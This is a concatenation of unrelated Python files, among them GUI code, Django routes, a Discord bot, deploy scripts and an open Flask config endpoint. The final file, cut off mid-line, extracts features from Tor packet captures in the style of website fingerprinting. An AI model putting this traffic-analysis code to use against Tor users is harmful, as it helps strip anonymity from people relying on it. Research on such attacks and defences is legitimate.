font=em_global_variables.TABLE_SUBTITLE_FONT)\n fs_dist_subtitle2.grid(row=0, column=1, sticky=('n'))\n if running_only:\n fs_dist_subtitle3 = tk.Label(\n fastest_stats_lf,\n text='VDOT',\n padx=3, pady=3,\n font=em_global_variables.TABLE_SUBTITLE_FONT,\n # bg='slate gray',\n # fg='white'\n )\n fs_dist_subtitle3.grid(row=0, column=2, sticky=('n'))\n\n # Fastest Stats Column Underline\n fs_col_titles_ul = tk.Canvas(fastest_stats_lf,\n bg=\"black\",\n height='0.5m',\n width='20m')\n fs_col_titles_ul.grid(row=1,\n column=0,\n columnspan=3,\n sticky=('new'))\n\n # Create Fastest Stats Distance Labels\n for stat_no, a_stat in fastest_stats.iterrows():\n if a_stat['Time'] <= 0:\n # Filter out bad times\n continue\n fslf_ysize += 1\n label_var = a_stat['Stat_Var']+\"_Lab\"\n a_dict = {label_var: tk.Label(fastest_stats_lf,\n text=a_stat['Stat_Label'],\n font=em_global_variables.VAR_LABEL_FONT,\n padx=5,\n pady=2,\n justify='right')}\n a_dict[a_stat['Stat_Var']+\"_Lab\"].grid(row=stat_no+2,\n column=0,\n # columnspan=1,\n sticky=(\"ne\"))\n value_var = a_stat['Stat_Var'] + \"_Time_Val\"\n # print('a_stat[\"Time\"]:', a_stat['Time'])\n field_value = (dt.datetime(1, 1, 1) + # time + 1 day\n dt.timedelta(seconds=a_stat['Time']))\n if field_value.day-1 > 0:\n field_val_string = format(\"%d days, %d h, %d m, %.1f s\" % (\n field_value.day-1,\n field_value.hour,\n field_value.minute,\n field_value.second+field_value.microsecond/1e6))\n elif field_value.hour > 0:\n field_val_string = format(\"%d h, %d m, %.1f s\" % (\n field_value.hour,\n field_value.minute,\n field_value.second+field_value.microsecond/1e6))\n elif field_value.minute > 0:\n field_val_string = format(\"%d m, %.1f s\" % (\n field_value.minute,\n field_value.second+field_value.microsecond/1e6))\n else:\n field_val_string = format(\"%.1f s\" % (\n field_value.second+field_value.microsecond/1e6))\n a_dict[value_var] = tk.Label(fastest_stats_lf,\n text=field_val_string,\n font=em_global_variables.VAR_VAL_FONT,\n justify=\"right\")\n a_dict[a_stat['Stat_Var']+\"_Time_Val\"].grid(row=stat_no+2,\n column=1,\n columnspan=1,\n sticky=(\"ne\"))\n if running_only:\n vdot_value_var = a_stat['Stat_Var']+\"_VDOT_Val\"\n vdot_field_value = a_stat['VDOT']\n a_dict[vdot_value_var] = tk.Label(\n fastest_stats_lf,\n text=vdot_field_value,\n font=em_global_variables.VAR_VAL_FONT,\n justify=\"right\")\n a_dict[a_stat['Stat_Var']+\"_VDOT_Val\"].grid(row=stat_no+2,\n column=2,\n columnspan=1,\n sticky=(\"ne\"))\n\n return 1, fslf_ysize\n","sub_path":"fastest_stats_lf.py","file_name":"fastest_stats_lf.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"227098601","text":"from django.conf.urls import url,include\nfrom . 
import views\n\nurlpatterns = [\n\n url(r'^register/$', views.register,name=\"api-register\"),\n\n url(r'^login/',views.login,name='api-login'),\n\n url(r'^add/',views.addnewpaste,name='api-addp'),\n\n url(r'^del/',views.dele,name='api-delp'),\n\n url(r'^search/',views.search,name='api-search'),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"403686036","text":"import base64\nimport ubiops\n\n\ndef ubiops_request(event, context):\n \"\"\"\n Deployment batch request triggered from a message on a Cloud Pub/Sub topic.\n\n :param dict event: Event payload.\n :param google.cloud.functions.Context context: Metadata for the event.\n \"\"\"\n\n pubsub_message = base64.b64decode(event['data']).decode('utf-8')\n\n # The API Token for UbiOps is hardcoded for simplicity in this example.\n # This should *absolutely never* be done in a production like environment.\n # Instead make use of the solutions provided, in this case by Google, to handle secrets and passwords.\n configuration = ubiops.Configuration()\n configuration.api_key['Authorization'] = 'Token abcdefghijklmnopqrstuvwxyz'\n\n client = ubiops.ApiClient(configuration)\n api = ubiops.api.CoreApi(client)\n api.batch_deployment_requests_create(\n project_name='test-project',\n deployment_name='test-deployment',\n version='version',\n data=[pubsub_message]\n )\n","sub_path":"google-cloud-functions-triggered-request/gcp-functions-recipe/functions/deployment-batch-request/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"651497170","text":"import os, json\n\nreplacelist = [\n[\"REPLACE_TEAM1\", \"\"],\n[\"REPLACE_TEAM2\", \"\"],\n[\"REPLACE_JSFILE\", \"\"],\n[\"REPLACE_INDEX\", \"https://www.guessgoldgraph.gg/LEC\"]\n]\n\n# Get the list of all files and directories\ndirpath = \"/lolesport_get/goleu\"\npath = os.getcwd() + dirpath\ndir_list = os.listdir(path)\n\n\n# index_html.writes all files\nfindgold = \"label: 'Gold',\"\nbefore = \"\t\t\t\tdata: \"\nafter = \" ,\"\nblen = len(before)\nalen = len(after)\nfindtime = \"col-sm-5\"\nbtime = len(\"
\")\natime = len(\"
\") + 1\nbteam1 = len(\" \")\nateam1 = \"

\"\n\nteam_dict = {\n\t'EG': 'EG',\n\t'100 Thieves': '100',\n\t'GG': 'GG',\n\t'Immortals': 'IMT',\n\t'Dignitas': 'DIG',\n\t'Team Liquid': 'TL',\n\t'CLG': 'CLG',\n\t'TSM': 'TSM',\n\t'FlyQuest': 'FLY',\n\t'Cloud9': 'C9'\n}\n\n\nbase_js = open(\"base_js.txt\", 'r')\nbase_html = open(\"base_html.txt\", 'r')\nbase_js_lines = base_js.readlines()\nbase_html_lines = base_html.readlines()\n\nweekgames = []\n\nfor gol in dir_list:\n\tgolfile = open(path + \"/\" + gol, 'r')\n\tprint(gol)\n\tlines = golfile.readlines()\n\tfilestr = \"\"\n\tgoldarray = []\n\tteam1 = \"\"\n\tteam2 = \"\"\n\tweek = -1\n\tfor index, line in enumerate(lines):\n\t\tif findgold in line:\n\t\t\tgoldlist = lines[index + 1][blen:][:-alen]\n\t\t\tgoldlist = goldlist[:-3] + \"]\"\n\t\t\tgoldarray = json.loads(goldlist)\n\t\tif findtime in line:\n\t\t\tdateweek = line[btime:][:-atime]\n\t\t\tdwarr = dateweek.split(\" \")\n\t\t\ttime = dwarr[0]\n\t\t\tfilestr = filestr + time\n\t\t\tweek = int(dwarr[1][5])\n\t\tif \"empty_action title_blue\" in line:\n\t\t\tteamstr = line[bteam1:].split(ateam1)\n\t\t\tteam1 = teamstr[0]\n\t\t\tprint(gol, len(teamstr), ateam1)\n\t\t\tteam2 = teamstr[1].split(\"
\")[0]\n\t\t\tfilestr = team1 + \"-\" + team2 + \"-\" + filestr\n\treplacegold = str(goldarray)\n\t#print(filestr, team1, team2, goldarray)\n\n\tnew_js = []\n\tfor line in base_js_lines:\n\t\tnew_js.append(line)\n\tnew_js[0] = 'var gamegold = ' + replacegold + '\\n'\n\tnew_file_js = open(\"games/\"+filestr+\".js\", 'w')\n\tnew_file_js.writelines(new_js)\n\tnew_file_js.close()\n\n\treplacelist[0][1] = team1\n\treplacelist[1][1] = team2\n\treplacelist[2][1] = filestr + \".js\"\n\n\n\tnew_html = []\n\tfor line in base_html_lines:\n\t\tnew_html.append(line)\n\tfor index, line in enumerate(new_html):\n\t\tfor r in replacelist:\n\t\t\tnew_html[index] = new_html[index].replace(r[0], r[1])\n\tnew_file_html = open(\"games/\"+filestr+\".html\", 'w')\n\tnew_file_html.writelines(new_html)\n\tnew_file_html.close()\n\n\tprint(filestr, gol)\n\n\twhile week > len(weekgames):\n\t\tweekgames.append([])\n\tweekgames[week - 1].append(filestr)\nmaxlen = 0\nfor w in weekgames:\n\twlen = len(w)\n\tif wlen > maxlen:\n\t\tmaxlen = wlen\nmaxlen = maxlen/5\n\nprint(maxlen, \"maxlen\")\nbase_index = open(\"index_base.txt\", 'r')\nindex_html = open(\"LEC.html\", 'w')\nindex_html.writelines(base_index.readlines())\n\nnumweeks = len(weekgames)\nindex_html.write(\"\\n\")\nfor idxweek, w in enumerate(reversed(weekgames)):\n\tindex_html.write(\"\\n\")\n\twsorted = sorted(w, key = lambda x: x[-10:])\n\t#print(wsorted)\n\tfor i in range(0, int(maxlen)):\n\t\tindex_html.write(\"\\n\")\n\tindex_html.write(\"\\n\")\nindex_html.write(\"
\\n\")\n\t\tif len(w)/5 > i:\n\t\t\tindex_html.write(\"
week \" + str(numweeks - idxweek) + \" day \" + str(i + 1) + \"
\\n\")\n\t\telse:\n\t\t\tindex_html.write(\"
 
\\n\")\n\t\tfor g in range(i*5, (i+1)*5):\n\t\t\tif g < len(w):\n\t\t\t\tgame = wsorted[g]\n\t\t\t\twarr = game.split(\"-\")\n\t\t\t\t#print(game)\n\t\t\t\tindex_html.write(\"\" + warr[0] + \" vs \" + warr[1] + \"
\\n\")\n\t\t\telse:\n\t\t\t\tindex_html.write(\" 
\\n\")\n\t\tindex_html.write(\"
\\n\")\n","sub_path":"makepageLEC.py","file_name":"makepageLEC.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"641877518","text":"import discord\nfrom discord.ext import commands\nimport random\nfrom database.dbutils import *\nfrom utilities.utils import *\nfrom utilities.courses import *\nimport json\n\nclass TextCommands(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n self.database = self.client.database\n \n async def cmds(self, ctx):\n pass\n\n \n '''\n Get a List of \"Assignable\" roles, i.e: Non-Admin, Non-Mod, Non-Permission roles.\n Iterate through the Guild Roles, check if it has Permissions.\n We need to make sure the Role does not have these permissions:\n - Administrator\n - Manage Server\n - Manage Roles\n - Manage Channels\n - Kick Members\n - Ban Members\n - Manage Nicknames\n - Manage Emojis\n - Manage Webhooks\n '''\n @commands.command()\n async def me(self, ctx, *, arg):\n await add_roles(ctx, arg)\n \n ''' Remove a role from a user '''\n @commands.command()\n async def notme(self, ctx, *, arg):\n await remove_roles(ctx, arg)\n\n @commands.command()\n async def course(self, ctx):\n print(\"hello?\")\n await queryCourse(ctx, ctx.message)\n\n @commands.command()\n async def dice(self, ctx):\n message = ctx.message\n await message.channel.send('Would you like to roll the die? Y/N')\n def check(m):\n return (m.content.lower() == 'y' or m.content.lower() == 'yes') and m.author.id == message.author.id\n \n msg = await self.client.wait_for('message', check=check)\n await message.channel.send('You rolled a ' +str(random.randint(1, 6)))\n \ndef setup(bot):\n bot.add_cog(TextCommands(bot))","sub_path":"cogs/TextCommands.py","file_name":"TextCommands.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"516821614","text":"from re import findall\nfrom setuptools import setup, find_packages\n\n\n__description__ = '''\nA package to help you setting up new projects with a fitting environment.\nYou have an idea, get coding lickety split!\n'''\n\n\nmeta_file = open(\"licketysplit/metadata.py\").read()\nmetadata = dict(findall(\"__([a-z]+)__\\s*=\\s*'([^']+)'\", meta_file))\n\nwith open(\"README.md\", \"r\") as readme_file:\n long_description = readme_file.read()\n\n\nsetup(\n name=metadata['packagename'],\n version=metadata['version'],\n url=metadata['url'],\n author=metadata['author'],\n author_email=metadata['authoremail'],\n license=metadata['license'],\n description=__description__,\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n entry_points={\n 'console_scripts' : [ 'licketysplit=licketysplit:main' ],\n },\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 3.7',\n 'Topic :: Utilities'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"13886567","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport matplotlib.pylab as pl\nimport itertools\n\n# functions\ndef unique(list1):\n x = np.array(list1)\n return np.unique(x)\n\ndef createColors(colors_arr):\n 
colors_arr = unique(colors_arr)\n color_map = {}\n count = 0\n thick = 5\n palette = itertools.cycle([\n \"#000000\",\n \"#0000FF\",\n \"#8A2BE2\",\n \"#A52A2A\",\n \"#DEB887\",\n \"#5F9EA0\",\n \"#7FFF00\",\n \"#D2691E\",\n \"#6495ED\",\n \"#DC143C\",\n \"#00FFFF\",\n \"#00008B\",\n \"#008B8B\",\n \"#A9A9A9\",\n \"#006400\",\n \"#BDB76B\",\n \"#8B008B\",\n \"#556B2F\",\n \"#FF8C00\",\n \"#9932CC\",\n \"#8B0000\",\n \"#E9967A\",\n \"#8FBC8F\",\n \"#483D8B\",\n \"#2F4F4F\",\n \"#00CED1\",\n \"#9400D3\",\n \"#FF1493\",\n \"#00BFFF\",\n \"#696969\",\n \"#1E90FF\",\n \"#B22222\",\n \"#FFFAF0\",\n \"#228B22\",\n \"#FF00FF\",\n \"#DCDCDC\",\n \"#F8F8FF\",\n \"#FFD700\",\n \"#DAA520\",\n \"#808080\",\n \"#008000\",\n \"#ADFF2F\",\n \"#F0FFF0\",\n \"#FF69B4\",\n \"#CD5C5C\",\n \"#4B0082\",\n \"#FFFFF0\",\n \"#F0E68C\",\n \"#E6E6FA\",\n \"#FFF0F5\",\n \"#7CFC00\",\n \"#FFFACD\",\n \"#ADD8E6\",\n \"#F08080\",\n \"#E0FFFF\",\n \"#FAFAD2\",\n \"#90EE90\",\n \"#D3D3D3\",\n \"#FFB6C1\",\n \"#FFA07A\",\n \"#20B2AA\",\n \"#87CEFA\",\n \"#778899\",\n \"#B0C4DE\",\n \"#FFFFE0\",\n \"#00FF00\",\n \"#32CD32\",\n \"#FAF0E6\",\n \"#FF00FF\",\n \"#800000\",\n \"#66CDAA\",\n \"#0000CD\",\n \"#BA55D3\",\n \"#9370DB\",\n \"#3CB371\",\n \"#7B68EE\",\n \"#00FA9A\",\n \"#48D1CC\",\n \"#C71585\",\n \"#191970\",\n \"#F5FFFA\",\n \"#FFE4E1\",\n \"#FFE4B5\",\n \"#FFDEAD\",\n \"#000080\",\n \"#FDF5E6\",\n \"#808000\",\n \"#6B8E23\",\n \"#FFA500\",\n \"#FF4500\",\n \"#DA70D6\",\n \"#EEE8AA\",\n \"#98FB98\",\n \"#AFEEEE\",\n \"#DB7093\",\n \"#FFEFD5\",\n \"#FFDAB9\",\n \"#CD853F\",\n \"#FFC0CB\",\n \"#DDA0DD\",\n \"#B0E0E6\",\n \"#800080\",\n \"#FF0000\",\n \"#BC8F8F\",\n \"#4169E1\",\n \"#8B4513\",\n \"#FA8072\",\n \"#FAA460\",\n \"#2E8B57\",\n \"#FFF5EE\",\n \"#A0522D\",\n \"#C0C0C0\",\n \"#87CEEB\",\n \"#6A5ACD\",\n \"#708090\",\n \"#FFFAFA\",\n \"#00FF7F\",\n \"#4682B4\",\n \"#D2B48C\",\n \"#008080\",\n \"#D8BFD8\",\n \"#FF6347\",\n \"#40E0D0\",\n \"#EE82EE\",\n \"#F5DEB3\",\n \"#FFFFFF\",\n \"#F5F5F5\",\n \"#FFFF00\",\n \"#9ACD32\"])\n for i in colors_arr:\n color_map[i] = {\"color\": next(palette), \"thick\": thick}\n count = count + 1\n\n if thick == 5:\n thick = 9\n else:\n thick = 5\n\n return color_map\n\n# open\nwith open(\"./result_python.txt\") as f:\n content = f.readlines()\n\ncontent = [x.strip() for x in content]\n\n# initialize\nmy_dpi = 96\ncount = 1\nmax_x = 0\nmax_y = 0\ncolors_arr = []\ncount = 0\nthicks_x = []\nthicks_y = []\npoints = []\n\nfor c in content:\n c = c.split(\",\")\n x = int(c[0])\n r = int(c[1])\n\n if max_x < (x + r) * 1.05:\n max_x = int(round((x + r) * 1.05, 0))\n\n if max_y < (r * 1.05):\n max_y = int(round(r * 1.05, 0))\n\n colors_arr.append(r)\n\ncolor_map = createColors(colors_arr)\n\nfor i in range(0, max_x):\n thicks_x.append(i)\nfor i in range(0, max_y):\n thicks_y.append(i)\n\n# plot\nfig = plt.figure(figsize=(max_x, max_y), dpi=96)\n\nax = fig.add_subplot(111)\nax.axhline(y=0, linewidth=2, color='blue')\nax.axvline(x=0, linewidth=2, color='blue')\nax.set_xticks(thicks_x)\nax.set_yticks(thicks_y)\nax.set_xlim(0, max_x)\nax.set_ylim(0, max_y)\n\nfor c in content:\n print(\"Generating \" + str(count) + \" / \" + str(len(content)))\n \n c = c.split(\",\")\n x = int(c[0])\n r = int(c[1])\n \n circle = plt.Circle((x, 0), r, linewidth=color_map[r][\"thick\"], fill=False, edgecolor=color_map[r][\"color\"], zorder=1)\n ax.add_artist(circle)\n plt.scatter(x, r, s=3000, color=\"black\", zorder=2)\n \n points.append({\"x\": x, \"r\": r})\n \n count = count + 1\n \nfor point in points:\n 
x1 = point[\"x\"]\n y1 = point[\"r\"]\n \n for point2 in points:\n x2 = point2[\"x\"]\n y2 = point2[\"r\"]\n \n if x1 > x2:\n if abs(x1 - x2) == abs(y1 - y2):\n plt.plot([x1,x2], [y1,y2], linewidth=13, color=\"black\", zorder=2)\n \n if y1 == y2:\n plt.plot([x1,x2], [y1,y1], linewidth=13, color=\"black\", zorder=2)\n \n\nprint(\"Saving...\")\n\n\nplt.savefig(\"out4.png\", bbox_inches=\"tight\")\n","sub_path":"prime_numbers/part_5/run4.py","file_name":"run4.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"593131626","text":"\"\"\"\r\nWrite 5 students name and phone using write lines.\r\n\"\"\"\r\nfout = open('student.dat', 'w')\r\n# lst = []\r\n# for i in range(5):\r\n# name = input('Enter name - ')\r\n# phone = input('Phone - ')\r\n# strData = 'Name - '+name+' Phone - '+phone+'\\n'\r\n# lst.append(strData)\r\n#\r\n# print('List data is - ')\r\n# print(lst)\r\n# fout.writelines(lst)\r\n\r\nfor i in range(5):\r\n name = input('Enter name - ')\r\n phone = input('Phone - ')\r\n strData = 'Name - '+name+' Phone - '+phone+'\\n'\r\n print(strData)\r\n fout.write(strData)\r\nprint(\"OK I am done\")","sub_path":"FileHandling/WriteLilesStudentsToFile.py","file_name":"WriteLilesStudentsToFile.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"630062855","text":"from fabric.api import *\n\nproject = \"flask_skeleton\"\n\nenv.user = 'user'\nenv.hosts = ['server.com']\nenv.use_ssh_config = True\n\n\ndef d():\n \"\"\"\n deploy\n \"\"\"\n with cd(\"/home/mimu/dev/fskel\"):\n run(\"git pull origin master\")\n\n with prefix('source /home/mimu/dev/fskel/env/bin/activate'):\n run(\"pip install -r /home/mimu/dev/fskel/r.txt -q\")\n run(\"python manage.py -c app/deploy_config.py db upgrade\")\n run(\"python manage.py -c app/deploy_config.py uwsgi restart\")\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"454484041","text":"from django.conf.urls import patterns, include, url\n\nfrom app.views import *\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', home),\n url(r'^result/$', result),\n url(r'^clear/$', clear),\n url(r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"cleanup/cleanup/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"637005078","text":"from flask import Flask, render_template\r\napp = Flask(__name__)\r\n\r\n\r\n\r\nimport json\r\nfrom flask import Flask, request, jsonify\r\n\r\napp = Flask(__name__)\r\n\r\ndef read_config():\r\n with open('data.json') as json_file:\r\n return json.load(json_file)\r\n\r\ndef write_config(data):\r\n with open('data.json', 'w') as outfile:\r\n json.dump(data, outfile)\r\n\r\n@app.route('/config', methods=['GET', 'POST'])\r\ndef get_config():\r\n if request.method == 'POST':\r\n write_config(request.get_json())\r\n\r\n response = jsonify(read_config())\r\n\r\n return response\r\n else:\r\n response = jsonify(read_config())\r\n\r\n return response\r\n\r\n@app.after_request\r\ndef after_request(response):\r\n response.headers.add('Access-Control-Allow-Origin', '*')\r\n response.headers.add('Access-Control-Allow-Headers', 
'Content-Type,Authorization')\r\n response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\r\n return response\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"24123700","text":"print('Think of a number from 0 to 1000 and I will guess it in at most 10 tries')\n\nminimum = 0\nmaximum = 1000\nattempts = 0\n\nwhile attempts < 10:\n guess = int((maximum - minimum) / 2) + minimum\n print(f'My guess: {guess}')\n x = input('Too high, too low, or did I get it? (accepted answers: too high, too low, correct): ')\n if x == 'correct':\n print('I won!')\n break\n elif x == 'too low':\n minimum = guess\n attempts += 1\n elif x == 'too high':\n maximum = guess\n attempts += 1\n else:\n print('I do not understand')\n\nif attempts > 9:\n print('No cheating!')\n","sub_path":"Gra w zgadywanie liczb 2.py","file_name":"Gra w zgadywanie liczb 2.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"389440726","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n__author__ = \"coco\"\n__email__ = \"rlawnsgh0826@gmail.com\"\n__date__ = \"2019-08-26\"\n\n__last modified by__ = \"coco\"\n__last modified time__ = \"2019-09-25\"\n\n\n\"\"\"\nimport dpkt\nimport socket\nimport numpy as np\n\nfrom scipy.stats import skew\n\n\nclass flowGenerator:\n\n def __init__(self, pcap_path, ip):\n\n # initializer\n self._ip = ip\n self.total_cell, self.total_time_list, self.out_time_list, self.in_time_list = self.readPcap(pcap_path)\n\n def readPcap(self, pcap_path):\n\n tor_cell_list = list()\n out_time_list = list()\n in_time_list = list()\n total_time_list = list()\n\n pcap = dpkt.pcap.Reader(open(pcap_path, 'rb'))\n\n try:\n for timestamp, buf in pcap:\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n if eth.type != dpkt.ethernet.ETH_TYPE_IP:\n continue\n if ip.p != dpkt.ip.IP_PROTO_TCP:\n continue\n if socket.inet_ntoa(ip.src) == '192.168.160.10':\n continue\n if socket.inet_ntoa(ip.dst) == '192.168.160.10':\n continue\n\n # Start preprocessing\n if socket.inet_ntoa(ip.src) in self._ip:\n if len(buf) % 600 == 0:\n total_time_list.append(timestamp)\n out_time_list.append(timestamp)\n for _ in range(int(len(buf) // 600)):\n tor_cell_list.append(1)\n else:\n total_time_list.append(timestamp)\n out_time_list.append(timestamp)\n for _ in range(int(len(buf) // 600) + 1):\n tor_cell_list.append(1)\n else:\n if len(buf) % 600 == 0:\n total_time_list.append(timestamp)\n in_time_list.append(timestamp)\n for _ in range(int(len(buf) // 600)):\n tor_cell_list.append(-1)\n else:\n total_time_list.append(timestamp)\n in_time_list.append(timestamp)\n for _ in range(int(len(buf) // 600) + 1):\n tor_cell_list.append(-1)\n except AttributeError:\n pass\n except dpkt.dpkt.UnpackError:\n pass\n\n return tor_cell_list, total_time_list, out_time_list, in_time_list\n\n def getCellLength(self):\n\n # mean, std, var, skew\n return np.mean(self.total_cell), np.std(self.total_cell), np.var(self.total_cell), skew(self.total_cell)\n\n def getCellIAT(self):\n\n # min, max, mean, median, std, var, quantile(0.25, 0.75), skew\n iat_list = []\n out_iat_list = []\n in_iat_list = []\n\n # sort the de-duplicated timestamps; a bare set() would lose the ordering that the inter-arrival times depend on\n total_time_list = sorted(set(self.total_time_list))\n out_time_list = sorted(set(self.out_time_list))\n in_time_list = sorted(set(self.in_time_list))\n\n for i, time in enumerate(total_time_list):\n if i == 0:\n continue\n _iat_time = total_time_list[i] - total_time_list[i - 1]\n iat_list.append(_iat_time)\n\n for i, time in enumerate(out_time_list):\n if i == 0:\n continue\n _iat_time = out_time_list[i] - out_time_list[i - 1]\n out_iat_list.append(_iat_time)\n\n for i, time in enumerate(in_time_list):\n if i == 0:\n continue\n _iat_time = in_time_list[i] - in_time_list[i - 1]\n in_iat_list.append(_iat_time)\n\n return np.min(iat_list), np.max(iat_list), np.mean(iat_list), np.median(iat_list), np.std(iat_list), np.var(\n iat_list), np.quantile(iat_list, 0.25), np.quantile(iat_list, 0.75), skew(iat_list), \\\n np.min(out_iat_list), 
np.max(out_iat_list), np.mean(out_iat_list), np.median(out_iat_list), np.std(\n out_iat_list), np.var(out_iat_list), np.quantile(out_iat_list, 0.25), np.quantile(out_iat_list, 0.75), skew(\n out_iat_list), \\\n np.min(in_iat_list), np.max(in_iat_list), np.mean(in_iat_list), np.median(in_iat_list), np.std(\n in_iat_list), np.var(in_iat_list), np.quantile(in_iat_list, 0.25), np.quantile(in_iat_list, 0.75), skew(\n in_iat_list)\n\n def getCellBurst(self):\n\n idx_list = []\n\n start = True # if 1, if False -1\n\n for i in range(len(self.total_cell) - 1):\n if self.total_cell[0] == 1:\n start = True\n else:\n start = False\n\n if self.total_cell[i] != self.total_cell[i + 1]:\n idx_list.append(i + 1)\n\n if idx_list[-1] != len(self.total_cell):\n idx_list.append(len(self.total_cell))\n\n ori_burst = [idx_list[0]] + np.diff(idx_list).tolist()\n if start is True:\n out_burst = ori_burst[0::2]\n in_burst = ori_burst[1::2]\n else:\n out_burst = ori_burst[1::2]\n in_burst = ori_burst[0::2]\n\n return np.max(ori_burst), np.mean(ori_burst), np.median(ori_burst), np.std(ori_burst), np.var(\n ori_burst), np.quantile(ori_burst, 0.25), np.quantile(ori_burst, 0.75), skew(ori_burst), \\\n np.max(out_burst), np.mean(out_burst), np.median(out_burst), np.std(out_burst), np.var(\n out_burst), np.quantile(out_burst, 0.25), np.quantile(out_burst, 0.75), skew(out_burst), \\\n np.max(in_burst), np.mean(in_burst), np.median(in_burst), np.std(in_burst), np.var(\n in_burst), np.quantile(in_burst, 0.25), np.quantile(in_burst, 0.75), skew(in_burst),\n\n def get30CellBurst(self):\n\n idx_list = []\n\n start = True # if 1, if False -1\n\n first30 = self.total_cell[:30]\n\n for i in range(len(first30) - 1):\n if first30[0] == 1:\n start = True\n else:\n start = False\n\n if first30[i] != first30[i + 1]:\n idx_list.append(i + 1)\n\n if idx_list[-1] != len(first30):\n idx_list.append(len(first30))\n\n ori_burst = [idx_list[0]] + np.diff(idx_list).tolist()\n if start is True:\n out_burst = ori_burst[0::2]\n in_burst = ori_burst[1::2]\n else:\n out_burst = ori_burst[1::2]\n in_burst = ori_burst[0::2]\n\n return np.max(ori_burst), np.mean(ori_burst), np.median(ori_burst), np.std(ori_burst), np.var(\n ori_burst), np.quantile(ori_burst, 0.25), np.quantile(ori_burst, 0.75), skew(ori_burst), \\\n np.min(out_burst), np.max(out_burst), np.mean(out_burst), np.median(out_burst), np.std(\n out_burst), np.var(out_burst), np.quantile(out_burst, 0.25), np.quantile(out_burst, 0.75), skew(out_burst), \\\n np.min(in_burst), np.max(in_burst), np.mean(in_burst), np.median(in_burst), np.std(in_burst), np.var(\n in_burst), np.quantile(in_burst, 0.25), np.quantile(in_burst, 0.75), skew(in_burst)\n\n def getCellPreposition(self):\n\n idx_list = []\n start = True\n\n cells = self.total_cell[:300]\n for c in range(len(cells) - 1):\n if cells[0] == 1:\n start = True\n else:\n start = False\n if cells[c] != cells[c + 1]:\n idx_list.append(c + 1)\n\n if idx_list[-1] != len(cells):\n idx_list.append(len(cells))\n\n ori = [idx_list[0]] + np.diff(idx_list).tolist()\n if start is True:\n in_pre = ori[0::2]\n else:\n in_pre = ori[1::2]\n\n return np.sum(in_pre), len(in_pre)\n\n def getCellOrdering(self):\n c1 = 0\n c2 = 0\n temp1 = []\n temp2 = []\n\n for cell in self.total_cell:\n if cell == 1:\n temp1.append(c1)\n c1 += 1\n if cell == -1:\n temp2.append(c2)\n c2 += 1\n\n return np.max(temp2), np.mean(temp2), np.median(temp2), np.std(temp2), np.var(temp2), np.quantile(temp2,\n 0.25), np.quantile(\n temp2, 0.75), skew(temp2), \\\n np.max(temp1), 
np.mean(temp1), np.median(temp1), np.std(temp1), np.var(temp1), np.quantile(temp1,\n 0.25), np.quantile(\n temp1, 0.75), skew(temp1)\n\n def getCellConcentration(self):\n\n out_concentration = []\n\n chunks = [self.total_cell[x:x + 30] for x in range(0, len(self.total_cell), 30)]\n for item in chunks:\n o = 0\n for p in item:\n if p == 1:\n o += 1\n out_concentration.append(o)\n\n return np.max(out_concentration), np.mean(out_concentration), np.median(out_concentration), np.std(\n out_concentration), np.var(out_concentration), np.quantile(out_concentration, 0.25), np.quantile(\n out_concentration, 0.75), skew(out_concentration)\n\n def getFirstLast30Cell(self):\n\n f30In = []\n f30Out = []\n l30In = []\n l30Out = []\n\n for cell in self.total_cell[:30]:\n if cell == 1:\n f30Out.append(cell)\n else:\n f30In.append(cell)\n\n for cell in self.total_cell[-30:]:\n if cell == 1:\n l30Out.append(cell)\n else:\n l30In.append(cell)\n\n percf30In = len(f30In) / float(30)\n percf30Out = len(f30Out) / float(30)\n percl30In = len(l30In) / float(30)\n percl30Out = len(l30Out) / float(30)\n\n return len(f30In), len(f30Out), len(l30In), len(l30Out), percf30In, percf30Out, percl30In, percl30Out\n\n def getGeneralInformation(self):\n\n num_of_total_pkts = len(self.total_cell)\n # np.sum counts the matching cells; len() on a boolean mask 